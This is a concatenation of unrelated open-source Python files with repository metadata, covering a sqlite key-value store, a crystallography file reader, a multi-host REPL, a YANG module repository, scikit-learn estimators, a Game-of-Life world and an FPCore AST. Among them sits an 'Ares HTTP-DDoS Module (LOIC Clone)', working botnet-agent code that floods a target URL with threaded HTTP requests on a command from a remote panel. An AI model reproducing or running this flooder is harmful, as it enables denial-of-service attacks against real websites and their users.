except IndexError: raise KeyError('%s not found in sqlite' % (k,))
self.execute('delete from store where key=?', (k,))
self.commit()
def __contains__(self, k):
try:
ret = self.selectone('select key from store where key=?', (k,))
return true
except IndexError: return false
def clear(self):
self.execute('delete from store')
self.commit()
def get(self, k, default=None):
try:
ret = self[k]
except KeyError: return default
def setdefault(self, k, default=None):
try:
ret = self[k]
except KeyError:
ret = self[k] = default
return ret
def __iter__(self):
keys = self.execute('select key from store')
for k in keys:
yield k
def iterkeys(self):
return iter(self)
def keys(self):
return list(self.iterkeys())
def itervalues(self):
for k in self:
yield self[k]
def values(self):
return list(self.itervalues())
def iteritems(self):
for k in self:
yield (k, self[k])
def items(self):
return list(self.iteritems())
def pop(self, k, default='no one will ever pick this'):
try:
v = self[k]
del self[k]
return v
except KeyError:
if default == 'no one will ever pick this':
raise
return default
def popitem(self):
for k, v in self.iteritems():
del self[k]
return v
raise KeyError
def update(self, other, **kw):
for k, v in other.iteritems():
self[k] = v
if kw:
for k, v in kw.iteritems():
self[k] = v
class Shove(object):
"""A storage-backed mapping object"""
def __init__(self, storeuri='sqlite://:memory:', cacheuri=None):
"""Initializes this shove with the given storage uri and cache uri.
Cache is ignored right now"""
import sqlite3
self.storeuri, self.cacheuri = storeuri, cacheuri
if cacheuri: raise NotImplementedError('MyShove does not support cache uris right now')
assert storeuri.startswith('sqlite://')
if storeuri.startswith('sqlite://'):
uri = storeuri.replace('sqlite://', '')
if uri.startswith('/'):
uri = uri[1:]
# try a few times to connect
self.store = {}
for i in range(10):
try:
self.store = SQLiteStore(uri)
break
except sqlite3.OperationalError: pass
#print 'store is %s' % (self.store,)
def __getattr__(self, k):
if k in 'storeuri cacheuri store'.split():
return self.__dict__[k]
return getattr(self.store, k)
def __setattr__(self, k, v):
if k in 'storeuri cacheuri store'.split():
self.__dict__[k] = v
return
setattr(self.store, k, v)
def __getitem__(self, k):
return self.store[k]
def __setitem__(self, k, v):
self.store[k] = v
| {
"repo_name": "neeraj-kumar/nkpylib",
"path": "nkshove.py",
"copies": "1",
"size": "7036",
"license": "bsd-3-clause",
"hash": 1910703471329517600,
"line_mean": 33.8316831683,
"line_max": 131,
"alpha_frac": 0.5928084139,
"autogenerated": false,
"ratio": 4.300733496332518,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.009082689539983873,
"num_lines": 202
} |
# A replacement for the wrapper for the CCP4 program MTZDUMP using CCTBX
# to access the file directly.
import copy
import os
from iotbx import mtz
class Mtzdump:
"""A class to give the same functionality as the wrapper for the CCP4
MTZDUMP program."""
def __init__(self):
self._header = {"datasets": [], "dataset_info": {}}
self._batch_header = {}
self._batches = None
self._reflections = 0
self._resolution_range = (0, 0)
def set_working_directory(self, wd):
pass
def get_working_directory(self):
return None
def set_hklin(self, hklin):
self._hklin = hklin
def dump(self):
"""Actually obtain the contents of the mtz file header."""
assert self._hklin, self._hklin
assert os.path.exists(self._hklin), self._hklin
mtz_obj = mtz.object(self._hklin)
# work through the file acculumating the necessary information
self._header["datasets"] = []
self._header["dataset_info"] = {}
self._batches = [batch.num() for batch in mtz_obj.batches()]
self._header["column_labels"] = [column.label() for column in mtz_obj.columns()]
self._header["column_types"] = [column.type() for column in mtz_obj.columns()]
self._resolution_range = mtz_obj.max_min_resolution()
self._header["spacegroup"] = mtz_obj.space_group_name()
self._reflections = mtz_obj.n_reflections()
for crystal in mtz_obj.crystals():
if crystal.name() == "HKL_base":
continue
pname = crystal.project_name()
xname = crystal.name()
cell = crystal.unit_cell().parameters()
for dataset in crystal.datasets():
dname = dataset.name()
wavelength = dataset.wavelength()
dataset_id = f"{pname}/{xname}/{dname}"
dataset_number = dataset.i_dataset()
assert dataset_id not in self._header["datasets"]
self._header["datasets"].append(dataset_id)
self._header["dataset_info"][dataset_id] = {}
self._header["dataset_info"][dataset_id]["wavelength"] = wavelength
self._header["dataset_info"][dataset_id]["cell"] = cell
self._header["dataset_info"][dataset_id]["id"] = dataset_number
def get_columns(self):
"""Get a list of the columns and their types as tuples
(label, type) in a list."""
return [
(cl, self._header["column_types"][i])
for i, cl in enumerate(self._header["column_labels"])
]
def get_resolution_range(self):
return self._resolution_range
def get_datasets(self):
"""Return a list of available datasets."""
return self._header["datasets"]
def get_dataset_info(self, dataset):
"""Get the cell, spacegroup & wavelength associated with
a dataset. The dataset is specified by pname/xname/dname."""
result = copy.deepcopy(self._header["dataset_info"][dataset])
result["spacegroup"] = self._header["spacegroup"]
return result
def get_spacegroup(self):
"""Get the spacegroup recorded for this reflection file."""
return self._header["spacegroup"]
def get_batches(self):
"""Get a list of batches found in this reflection file."""
return self._batches
def get_reflections(self):
"""Return the number of reflections found in the reflection
file."""
return self._reflections
| {
"repo_name": "xia2/xia2",
"path": "src/xia2/Modules/Mtzdump.py",
"copies": "1",
"size": "3590",
"license": "bsd-3-clause",
"hash": -5232688800228670000,
"line_mean": 31.0535714286,
"line_max": 88,
"alpha_frac": 0.591086351,
"autogenerated": false,
"ratio": 4.0610859728506785,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5152172323850679,
"avg_score": null,
"num_lines": null
} |
"""A repl across hosts."""
from __future__ import print_function, unicode_literals
import ast
import sys
import traceback
PY2 = sys.version_info < (3,)
if PY2:
from cStringIO import StringIO
else:
from io import StringIO
if PY2:
input = raw_input # noqa
def exec_(code, namespace):
exec('exec code in namespace')
else:
exec_ = eval('exec')
def read_stmt():
stmt = ''
prompt = '>>> '
while True:
try:
line = input(prompt)
except EOFError:
print()
sys.exit(0)
stmt += line + '\n'
try:
ast.parse(stmt)
except SyntaxError as e:
msg = e.args[0]
if msg == 'unexpected EOF while parsing':
prompt = '... '
continue
raise
else:
if line.startswith((' ', '\t')) and prompt == '... ':
continue
return stmt
namespace = {}
def runit(stmt):
code = compile(stmt, '<stdin>', 'single', dont_inherit=True)
buf = sys.stdout = StringIO()
try:
exec_(code, namespace)
except Exception:
return False, traceback.format_exc()
return True, buf.getvalue()
def dorepl(group):
from chopsticks.tunnel import ErrorResult
from repl import runit
try:
stmt = read_stmt()
except Exception:
traceback.print_exc()
return
results = group.call(runit, stmt)
vals = list(results.values())
if all(vals[0] == v for v in vals[1:]):
results = {'all %d' % len(vals): vals[0]}
for host, result in sorted(results.items()):
if isinstance(result, ErrorResult):
success = False
result = result.msg
else:
success, result = result
color = '32' if success else '31'
if sys.stderr.isatty():
fmt = '\x1b[{color}m[{host}]\x1b[0m {l}'
else:
fmt = '[{host}] {l}'
for l in result.splitlines():
print(fmt.format(host=host, color=color, l=l))
if __name__ == '__main__':
from chopsticks.tunnel import Docker
from chopsticks.group import Group
import chopsticks.ioloop
chopsticks.tunnel.PICKLE_LEVEL = 2
class Py2Docker(Docker):
python3 = 'python2'
group = Group([
Py2Docker('python2.7', image='python:2.7'),
Docker('python3.3', image='python:3.3'),
Docker('python3.4', image='python:3.4'),
Docker('python3.5', image='python:3.5'),
Docker('python3.6', image='python:3.6'),
])
try:
while True:
dorepl(group)
finally:
del group
| {
"repo_name": "lordmauve/chopsticks",
"path": "repl.py",
"copies": "1",
"size": "2656",
"license": "apache-2.0",
"hash": 4050363647918983700,
"line_mean": 23.3669724771,
"line_max": 65,
"alpha_frac": 0.5410391566,
"autogenerated": false,
"ratio": 3.7942857142857145,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.983268423834105,
"avg_score": 0.0005281265089328827,
"num_lines": 109
} |
"""A repository for searching and holding loaded pyang modules"""
import os
import sys
import io
from . import util
from . import syntax
class Repository(object):
"""Abstract base class that represents a module repository"""
def get_modules_and_revisions(self, ctx):
"""Return a list of all modules and their revisons
Returns a tuple (`modulename`, `revision`, `handle`), where
`handle' is used in the call to get_module_from_handle() to
retrieve the module.
"""
def get_module_from_handle(self, handle):
"""Return the raw module text from the repository
Returns (`ref`, `in_format`, `text`) if found, or None if not found.
`ref` is a string which is used to identify the source of
the text for the user. used in error messages
`in_format` is one of 'yang' or 'yin' or None.
`text` is the raw text data
Raises `ReadError`
"""
class ReadError(Exception):
"""Signals that an error occured during module retrieval"""
class FileRepository(Repository):
def __init__(self, path="", use_env=True, no_path_recurse=False,
verbose=False):
"""Create a Repository which searches the filesystem for modules
`path` is a `os.pathsep`-separated string of directories
"""
Repository.__init__(self)
self.dirs = []
self.no_path_recurse = no_path_recurse
self.modules = None
self.verbose = verbose
for directory in path.split(os.pathsep):
self._add_directory(directory)
while use_env:
use_env = False
modpath = os.getenv('YANG_MODPATH')
if modpath is not None:
for directory in modpath.split(os.pathsep):
self._add_directory(directory)
home = os.getenv('HOME')
if home is not None:
self._add_directory(os.path.join(home, 'yang', 'modules'))
inst = os.getenv('YANG_INSTALL')
if inst is not None:
self._add_directory(os.path.join(inst, 'yang', 'modules'))
break # skip search if install location is indicated
default_install = os.path.join(
sys.prefix, 'share', 'yang', 'modules')
if os.path.exists(default_install):
self._add_directory(default_install)
break # end search if default location exists
# for some systems, sys.prefix returns `/usr`
# but the real location is `/usr/local`
# if the package is installed with pip
# this information can be easily retrieved
import pkgutil
if not pkgutil.find_loader('pip'):
break # abort search if pip is not installed
# hack below to handle pip 10 internals
# if someone knows pip and how to fix this, it would be great!
location = None
try:
import pip.locations as locations
location = locations.distutils_scheme('pyang')
except:
try:
import pip._internal.locations as locations
location = locations.distutils_scheme('pyang')
except:
pass
if location is not None:
self._add_directory(
os.path.join(location['data'], 'share', 'yang', 'modules'))
if verbose:
sys.stderr.write('# module search path: %s\n'
% os.pathsep.join(self.dirs))
def _add_directory(self, directory):
if (not directory
or directory in self.dirs
or not os.path.isdir(directory)):
return False
self.dirs.append(directory)
return True
def _setup(self, ctx):
# check all dirs for yang and yin files
self.modules = []
def add_files_from_dir(d):
try:
files = os.listdir(d)
except OSError:
files = []
for fname in files:
absfilename = os.path.join(d, fname)
if os.path.isfile(absfilename):
m = syntax.re_filename.search(fname)
if m is not None:
name, rev, in_format = m.groups()
if not os.access(absfilename, os.R_OK):
continue
if absfilename.startswith("./"):
absfilename = absfilename[2:]
handle = in_format, absfilename
self.modules.append((name, rev, handle))
elif (not self.no_path_recurse
and d != '.' and os.path.isdir(absfilename)):
add_files_from_dir(absfilename)
for d in self.dirs:
add_files_from_dir(d)
def get_modules_and_revisions(self, ctx):
if self.modules is None:
self._setup(ctx)
return self.modules
def get_module_from_handle(self, handle):
in_format, absfilename = handle
fd = None
try:
fd = io.open(absfilename, "r", encoding="utf-8")
text = fd.read()
if self.verbose:
util.report_file_read(absfilename)
except IOError as ex:
raise self.ReadError("%s: %s" % (absfilename, ex))
except UnicodeDecodeError as ex:
s = str(ex).replace('utf-8', 'utf8')
raise self.ReadError("%s: unicode error: %s" % (absfilename, s))
finally:
if fd is not None:
fd.close()
if in_format is None:
in_format = util.guess_format(text)
return absfilename, in_format, text
| {
"repo_name": "mbj4668/pyang",
"path": "pyang/repository.py",
"copies": "1",
"size": "5853",
"license": "isc",
"hash": 7259231834219622000,
"line_mean": 35.1296296296,
"line_max": 79,
"alpha_frac": 0.5375021357,
"autogenerated": false,
"ratio": 4.491941673062164,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0011138195316939279,
"num_lines": 162
} |
"""A repository of custom sklearn estimators."""
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.cluster import MiniBatchKMeans
from sklearn.exceptions import NotFittedError
from sklearn.utils.validation import check_array
from nlp_playground.exceptions import BadValidation
from nlp_playground.lib.sequences import greedy_translate
class DummyEstimator(BaseEstimator):
"""
Dummy estimator to fit the interface and not do anything.
This is nice to have for testing, debugging, and
who-knows-what-else.
"""
# pylint: disable=invalid-name,unused-argument
def fit(self, X, y=None):
"""Mock estimator fit method."""
check_array(X)
return self
def predict(self, X): # pylint: disable=invalid-name
"""Mock estimator predict method."""
check_array(X)
return np.arange(len(X))
def transform(self, X): # pylint: disable=invalid-name
"""Mock estimator transform method."""
check_array(X)
return X
def score(self, X, y=None): # pylint: disable=invalid-name
"""Mock estimator score method."""
return X[0][0]
class ClusteringWithSupervision(BaseEstimator):
"""
Benchmark unsupervised learning against supervised target labels.
This is a scikit-learn estimator that acts as a utility for when
trying to produce unsupervised learning results that match
class labels.
We take a scikit-learn clustering algorithm and fit the
model to our dataset. The number of clusters used (`n_clusters`),
is the same as the number of different classes that our dataset
has.
We use some heuristics to figure out which cluster corresponds
to which class, and then treat our model as a supervised
learning classifier.
Example:
>>> from sklearn.estimators import MiniBatchKMeans
>>> c = ClusteringWithSupervision(cluster_instance=MiniBatchKMeans())
>>> c.fit(data, labels)
>>> c.score(data, labels)
Args:
cluster_instance: An instance of a scikit-learn clustering
class.
"""
n_clusters = None
_n_clusters = None
cluster_instance = None
_cluster_instance = None
_is_fitted = False
def __init__(self, **params):
"""Initialize the class."""
self.set_params(**params)
def __getattr__(self, name):
"""
Look up missing attributes on clustering instance.
The scikit-learn Estimator API assumes that every parameter
passed to `__init__()` or `get_params()` will become
a parameter on the estimator object.
Since most of the parameters for this class will really
be the parameters for the underlying estimator at
`self.cluster_instance`, we pass on key lookups to our
child.
"""
return getattr(self.cluster_instance, name)
def _assert_is_fitted(self):
"""Make sure that our underlying estimator is fitted."""
if not self._is_fitted:
raise NotFittedError(
"This {} instance is not fitted yet. Call 'fit' with "
"appropriate arguments before using this method."
.format(type(self).__name__)
)
def get_params(self, deep=True):
"""Return the cluster instance and its own parameters."""
if not self.cluster_instance:
self.cluster_instance = MiniBatchKMeans()
return {
'cluster_instance': self.cluster_instance,
**self.cluster_instance.get_params(deep),
'n_clusters': self.n_clusters
}
def set_params(self, **params):
"""
Set the parameters for this estimator.
`cluster_instance` is a parameter that lets us pick
what estimator we actually want to use. All other possible
parameters are just passed to `cluster_instance.set_params()`.
"""
if not params:
return self
cluster_instance = params.pop('cluster_instance', None)
self.cluster_instance = cluster_instance or MiniBatchKMeans()
return self.cluster_instance.set_params(**params)
def fit(self, X, y): # pylint: disable=invalid-name
"""
Fit `X` with the same number of clusters as `y` as unique items.
Calculate the number of unique class labels are in `y`,
and then train a clustering algorithm on `X` where we look
for the same number of clusters as classes.
"""
if not hasattr(self.cluster_instance, 'get_params'):
raise BadValidation(
"Please pass `cluster_instance` parameter with a"
" scikit-learn clustering estimator."
)
self._n_clusters = len(set(y))
params = self.cluster_instance.get_params()
params['n_clusters'] = self._n_clusters
# The scikit-learn estimator interface doesn't let us
# have mutable public object attributes.
# Additionally, scikit-learn's clone() function breaks if
# we assign an estimator class instead of an object.
self._cluster_instance = self.cluster_instance.__class__(
**params
)
self._cluster_instance.fit(X, y)
self._is_fitted = True
return self
def predict(self, X): # pylint: disable=invalid-name
"""Wrap `self.cluster_instance.predict()`."""
self._assert_is_fitted()
return self._cluster_instance.predict(X)
def transform(self, X): # pylint: disable=invalid-name
"""Wrap for `self.cluster_instance.transform()`."""
self._assert_is_fitted()
return self._cluster_instance.transform(X)
def score(self, X, y=None): # pylint: disable=invalid-name
"""
Score our estimator, with or without labels.
If the argument `y` is not `None`, then we
score our model's *prediction* from X against
y with Adjusted Mutual Information scoring.
If `y` is `None`, then we just wrap
`self.cluster_instance.score()`.
"""
self._assert_is_fitted()
if y is not None:
predictions = self.predict(X)
return translate_score(predictions, y)
return self._cluster_instance.score(X)
def translate_score(predictions, ground_truth) -> float:
"""
Translate predictions to match ground truth and return mean.
When we get clustering predictions, the clustering
assignments are essentially random. For four data points
and two clusters, the following arrays mean the same
thing::
[0, 0, 1, 1]
[1, 1, 0, 0]
This can make it difficult to directly compare our
clustering assignments to a labeled target, so we
"translate" our assignments to the configuration
with the smallest Hamming distance from
the ground truth. From that, we return the mean
accuracy.
Args:
predictions: Results from a clustering algorithm.
ground_truth: "Ground truth results". These typically
have labels with fixed positions, and are generally
used for training classifiers.
Returns:
The mean accuracy for the results.
"""
return np.mean(
ground_truth ==
np.array(greedy_translate(predictions, ground_truth))
)
| {
"repo_name": "jamesmishra/nlp-playground",
"path": "nlp_playground/lib/sklearn/estimators.py",
"copies": "1",
"size": "7347",
"license": "mit",
"hash": 5144869967980370000,
"line_mean": 33.1720930233,
"line_max": 77,
"alpha_frac": 0.6363141418,
"autogenerated": false,
"ratio": 4.455427531837477,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5591741673637477,
"avg_score": null,
"num_lines": null
} |
"""A representation of the World."""
import random
from sys import stdout
from existenz.globe import Globe
class World(object):
"""Representation of the world for denizens to live and die."""
def __init__(self, size=10):
self._size = size
self._day = 0
# create the two globes for current and future world states
self._current_globe = Globe(self._size)
self._future_globe = Globe(self._size)
# seed the current world
random.seed(1) # todo: raul - replace this will random configuration
for location in self.globe.locations:
location.plant = random.randint(0, 1)
self.dump_world()
@property
def globe(self):
"""A representation of the current state of the world."""
return self._current_globe
@property
def future_world(self):
"""A representation of the future world being constructed."""
return self._future_globe
@property
def size(self):
"""The size of the world length.
The total number of locations is equivalent to size * size.
"""
return self._size
def rotate(self, days=1):
"""Cycle through a given number of days in the world.
:param days: The number of days the world should life-cycle it denizens.
:type days: int
"""
for cycle in range(0, days):
self._day += 1
self.process_plants()
# rotate the globes after processing
temp_globe = self._current_globe
self._current_globe = self._future_globe
self._future_globe = temp_globe
self.dump_world()
def process_plants(self):
"""Method that will life-cycle plants in the world."""
for loc in self.globe.locations:
future_loc = self.future_world.get_location(loc.x, loc.y)
future_loc.plant = self.grow(loc)
def grow(self, location):
"""Method to determine if a plant should grow in a given location.
:param location: A candidate location for plant life.
:type location: existenz.location.Location
:return: A 1 is returned if the location should have a plant, else a
0 is returned if no plant should exist on the given location.
:rtype: int
"""
neighbors = self.globe.get_neighbors(location.x, location.y)
life_count = 0
for neighbor in neighbors:
life_count = life_count + 1 if neighbor.plant else life_count
if location.plant:
if life_count < 2 or life_count > 4:
return 0
else:
return 1
else:
if life_count == 3:
return 1
else:
return 0
def dump_world(self):
"""Method that will dump the state of the current world to stdio."""
stdout.write('-- day: ' + str(self._day) + '\n')
for x_coord in range(0, self.size):
for y_coord in range(0, self.size):
index = (self.size * x_coord) + y_coord
loc = self._current_globe.locations[index]
stdout.write(str(loc))
stdout.write('\n')
| {
"repo_name": "neoinsanity/existenz",
"path": "existenz/world.py",
"copies": "1",
"size": "3232",
"license": "apache-2.0",
"hash": 6868204092069047000,
"line_mean": 31,
"line_max": 80,
"alpha_frac": 0.5770420792,
"autogenerated": false,
"ratio": 4.15958815958816,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.523663023878816,
"avg_score": null,
"num_lines": null
} |
# Ares HTTP-DDoS Module (LOIC Clone)
# Pythogen
# Build 1.2
# Not intended for illegal uses.
# 12/27/2015 - 4:34 PM - Bug fix: DDoS completion notice now correctly synchronized.
# 12/27/2015 - 4:42 PM - Update: Functional stop feature now included.
# 12/29/2015 - 1:01 PM - Update: Functionality refinement. Clean up syntax.
# 12/29/2015 - 2:58 PM - Update: Informs when every thousand requests have been sent until completion. (Panel Feedback)
# Panel commands:
# ddos http://[host]/ [requests]
# ddos http://something.com/ 10000
# ddos stop 0
# Make sure to include 'ddos' in MODULES array in agent.py
# - Import Modules -
import requests
import time
import threading
import pythoncom
import pyHook
import utils
import random
import socket
import sys
import os
import string
from threading import Thread
from urllib import urlopen
from atexit import register
from os import _exit
from sys import stdout, argv
# - Stress functions -
def complete():
# Announce completion
utils.send_output("DDoS Complete.")
# Note: 10 Threads
def auto_send_request(server, number_of_requests=10):
# Globalize increment variable
global inc
global isDos
# Value for completion notification condition
requestsCheck = (requests - 1)
for z in range(number_of_requests):
try:
# Is it active?
if isDos == True:
# HTTP Connection >>
urlopen(server)
# Successful connection [!]
stdout.write(".") # indicated by period in console (for debugging)
# Increment ++
inc = inc + 1 # Count total requests sent
# Live display every thousand requests.
if inc % 1000 == 0:
utils.send_output("Requests: %s." % (inc))
# if not active then break ..
elif isDos == False:
break
except IOError:
# Failed connection [!]
stdout.write("E") # indicated by E in console (for debugging)
# Request count checking
if inc >= requestsCheck:
# Finished DDoS Session! Call next function
complete()
# Flood routine
def flood(url, number_of_requests = 1000, number_of_threads = 50):
number_of_requests_per_thread = int(number_of_requests/number_of_threads)
try:
for x in range(number_of_threads):
Thread(target=auto_send_request, args=(url, number_of_requests_per_thread)).start()
except:
stdout.write("\n[E]\n")
print("\nDone %i requests on %s" % (number_of_requests, url))
# - Command control -
def run(action, num_req):
# Globalize variables
global requests
global inc
global isDos
# inc initially set to 0
inc = 0
# isDos boolean
isDos = False
try:
# If command passed is not 'stop' then it's a host
if action != "stop":
utils.send_output("DDoS Started.")
# Boolean value that determines if stresser is active
isDos = True
# Argument passed from Wares panel
server = action # Host put in server
# Number of requests
requests = int(num_req) # Specified number of requests
# Call function to begin attack
flood(server, requests)
# Halt process
elif action == "stop":
# Turn it off
isDos = False
utils.send_output('DDoS Stopped.')
else:
# Display current commands
utils.send_output("Usage: DDoS [host] [requests]|stop 0")
except Exception, exc:
utils.send_output(exc)
def help():
# Help command details
help_text = """
Usage: ddos [host] [requests]|stop 0
HTTP-DDoS.
"""
return help_text
| {
"repo_name": "EzLucky/Wares",
"path": "client/modules/ddos.py",
"copies": "1",
"size": "3862",
"license": "mit",
"hash": -118286514455478420,
"line_mean": 22.265060241,
"line_max": 119,
"alpha_frac": 0.599430347,
"autogenerated": false,
"ratio": 3.9814432989690722,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5080873645969072,
"avg_score": null,
"num_lines": null
} |
# A resource can be any object that implements the following protocol:
#
# PROPERTIES
#
# name
# """ The machine-readable name for the resource. This should be a valid
# URI path element, and by convention, should only use alphanumeric ASCII
# characters and/or - and _. Other characters will probably also work but
# produce ugly URLs.
# """
#
# METHODS
#
# def list(self, offset=0, limit=None, ordering=None):
# """ Returns one of:
# a) a list of documents according to the specified pagination and ordering.
# b) a dictionary containing the keys "count" (specifying the total number of
# objects in the list; optional) and "items" (the actual items after
# pagination and ordering).
# """
#
# def item(self, key):
# """ Returns the document for the specified key, or None if the document
# could not be found.
# """
#
# def store(self, item, key=None, overwrite=True):
# """ Creates or updates the item in the collection. If "key" is given, any
# existing item at this position should be overwritten, unless "overwrite" is
# set to False. If "key" is not given, then a new key should be generated by the
# backend. Returns a tuple of (key, item, action) on successful insertion or
# update (action will be "INSERT" or "UPDATE" to indicate which happened), or
# throws a suitable exception if the insertion failed.
# """
#
# def delete(self, key):
# """ Deletes the item at "key" if it exists. Throws a suitable exception if
# the item cannot be deleted or doesn't exist.
# """
#
# def structure_item(self, item):
# """ Transforms the specified "item" into a "dumb" data structure. A dumb data
# structure is roughly equivalent to the JSON grammar; in practice, it means
# that only the following data structures should be used:
# - scalars: integers, floats, booleans, strings
# - lists ("list")
# - dictionaries ("dict")
# - nulls ("None")
# Resources that do not define this method are required to return dumb data from
# all retrievals directly.
| {
"repo_name": "tracksinspector/papi",
"path": "papi/resource.py",
"copies": "1",
"size": "1959",
"license": "mit",
"hash": 6342293443702749000,
"line_mean": 38.18,
"line_max": 80,
"alpha_frac": 0.718734048,
"autogenerated": false,
"ratio": 3.7745664739884393,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4993300521988439,
"avg_score": null,
"num_lines": null
} |
"""A reusable AST for manipulating or executing FPCores in python."""
import typing
def sexp_to_string(e):
if isinstance(e, list) or isinstance(e, tuple):
return '(' + ' '.join((sexp_to_string(x) for x in e)) + ')'
else:
return str(e)
def annotation_to_string(e, props, shape=None):
if props:
if shape:
return ('(! ' + ''.join((':' + k + ' ' + sexp_to_string(v) + ' ' for k, v in props.items()))
+ str(e) + ' '.join((sexp_to_string(dim) for dim in shape)) + ')')
else:
return '(! ' + ''.join((':' + k + ' ' + sexp_to_string(v) + ' ' for k, v in props.items())) + str(e) + ')'
else:
if shape:
return '(' + str(e) + ' '.join((sexp_to_string(dim) for dim in shape)) + ')'
else:
return str(e)
def diff_props(global_props, local_props):
if global_props is None:
if local_props is None:
return {}, {}
else:
return local_props, local_props
else:
if local_props is None:
return global_props, {}
else:
all_props = {}
all_props.update(global_props)
all_props.update(local_props)
new_props = {k:v for k, v in local_props.items() if k not in global_props or global_props[k] != v}
return all_props, new_props
def update_props(old_props, new_props):
if old_props:
if new_props:
updated_props = {}
updated_props.update(old_props)
updated_props.update(new_props)
return updated_props
else:
return old_props
else:
return new_props
# base ast class
class Expr(object):
name: str = 'Expr'
def subexprs(self):
raise NotImplementedError()
def replace_subexprs(self, exprs):
raise NotImplementedError()
def copy(self):
exprs = [[e.copy() for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
def depth_limit(self, n):
if n > 0:
exprs = [[e.depth_limit(n-1) for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
else:
return EmptyExpr()
def remove_annotations(self):
exprs = [[e.remove_annotations() for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
def condense_annotations(self, global_props=None, local_props=None):
all_props, new_props = diff_props(global_props, local_props)
exprs = [[e.condense_annotations(all_props, None) for e in es] for es in self.subexprs()]
if new_props:
return Ctx(new_props, self.replace_subexprs(exprs))
else:
return self.replace_subexprs(exprs)
def canonicalize_annotations(self, global_props=None):
exprs = [[e.canonicalize_annotations(global_props) for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
def merge_annotations(self, annotations, local_props=None):
new_props = update_props(local_props, annotations.get(id(self)))
exprs = [[e.merge_annotations(annotations, None) for e in es] for es in self.subexprs()]
if new_props:
return Ctx(new_props, self.replace_subexprs(exprs))
else:
return self.replace_subexprs(exprs)
def expand_tensor(self, ctx):
exprs = [[e.expand_tensor(ctx) for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
class EmptyExpr(Expr):
name: str = 'EmptyExpr'
def subexprs(self):
return []
def replace_subexprs(self, exprs):
return EmptyExpr()
def __str__(self):
return '...'
def __repr__(self):
return type(self).__name__ + '()'
# arbitrary s-expression data (usually from properties)
class Data(Expr):
name: str = 'Data'
def __init__(self, value) -> None:
self.value = value
def __str__(self):
return sexp_to_string(self.value)
def __repr__(self):
return type(self).__name__ + '(' + repr(self.value) + ')'
def __eq__(self, other):
try:
return self.value == other.value
except AttributeError:
return self.value == other
def __hash__(self):
return hash(self.value)
def subexprs(self):
return []
def replace_subexprs(self, exprs):
return type(self)(self.value)
def is_number(self):
return isinstance(self.value, Val) and not isinstance(self.value, Constant)
def as_number(self, strict=False):
if isinstance(self.value, Val) and not isinstance(self.value, Constant):
return self.value
elif strict:
raise TypeError('data is not a number')
else:
return None
def is_symbol(self):
return isinstance(self.value, Var) or isinstance(self.value, Constant)
def as_symbol(self, strict=False):
if isinstance(self.value, Var) or isinstance(self.value, Constant):
return self.value.value
elif strict:
raise TypeError('data is not a symbol')
else:
return None
def is_string(self):
return isinstance(self.value, String)
def as_string(self, strict=False):
if isinstance(self.value, String):
return self.value.value
elif strict:
raise TypeError('data is not a string')
else:
return None
def is_list(self):
return isinstance(self.value, tuple)
def as_list(self, strict=False):
if isinstance(self.value, tuple):
return self.value
elif strict:
raise TypeError('data is not a list')
else:
return None
# values
class ValueExpr(Expr):
name: str = 'ValueExpr'
# Except for integers, all values (variables, constants, or numbers)
# are represented as strings in the AST.
def __init__(self, value: str) -> None:
self.value: str = value
def __str__(self):
return str(self.value)
def __repr__(self):
return type(self).__name__ + '(' + repr(self.value) + ')'
def subexprs(self):
return []
def replace_subexprs(self, exprs):
return type(self)(self.value)
def depth_limit(self, n):
# always return the whole value
exprs = [[e.depth_limit(n-1) for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
class Var(ValueExpr):
name: str = 'Var'
def __eq__(self, other):
try:
return self.value == other.value
except AttributeError:
return self.value == other
def __hash__(self):
return hash(self.value)
class Val(ValueExpr):
name: str = 'Val'
def __eq__(self, other):
try:
return self.value == other.value
except AttributeError:
return self.value == other
def __hash__(self):
return hash(self.value)
def canonicalize_annotations(self, global_props=None):
result = super().canonicalize_annotations(global_props)
if global_props:
return Ctx(global_props, result)
else:
return result
class Constant(Val):
name: str = 'Constant'
class Decnum(Val):
name: str = 'Decnum'
class Hexnum(Val):
name: str = 'Hexnum'
class Integer(Val):
name: str = 'Integer'
def __init__(self, i: int) -> None:
super().__init__(str(i))
self.i = i
def __repr__(self):
return type(self).__name__ + '(' + repr(self.i) + ')'
def replace_subexprs(self, exprs):
return type(self)(self.i)
class Rational(Val):
name: str = 'Rational'
def __init__(self, p: int, q: int) -> None:
super().__init__(str(p) + '/' + str(q))
self.p : int = p
self.q : int = q
def __repr__(self):
return type(self).__name__ + '(' + repr(self.p) + ', ' + repr(self.q) + ')'
def replace_subexprs(self, exprs):
return type(self)(self.p, self.q)
class Digits(Val):
name: str = 'digits'
def __init__(self, m: int, e: int, b: int) -> None:
super().__init__('(' + self.name + ' ' + str(m) + ' ' + str(e) + ' ' + str(b) + ')')
self.m: int = m
self.e: int = e
self.b: int = b
def __repr__(self):
return type(self).__name__ + '(' + repr(self.m) + ', ' + repr(self.e) + ', ' + repr(self.b) + ')'
def replace_subexprs(self, exprs):
return type(self)(self.m, self.e, self.b)
class String(ValueExpr):
name: str = 'String'
def __eq__(self, other):
try:
return self.value == other.value
except AttributeError:
return self.value == other
def __hash__(self):
return hash(self.value)
# rounding contexts
class Ctx(Expr):
name: str = '!'
def __init__(self, props: dict, body: Expr) -> None:
self.props = props
self.body = body
def __str__(self):
return ('(' + self.name + ' '
+ ''.join((':' + k + ' ' + sexp_to_string(v) + ' ' for k, v in self.props.items()))
+ str(self.body) + ')')
def __repr__(self):
return type(self).__name__ + '(' + repr(self.props) + ', ' + repr(self.body) + ')'
def subexprs(self):
return [[self.body]]
def replace_subexprs(self, exprs):
((body,),) = exprs
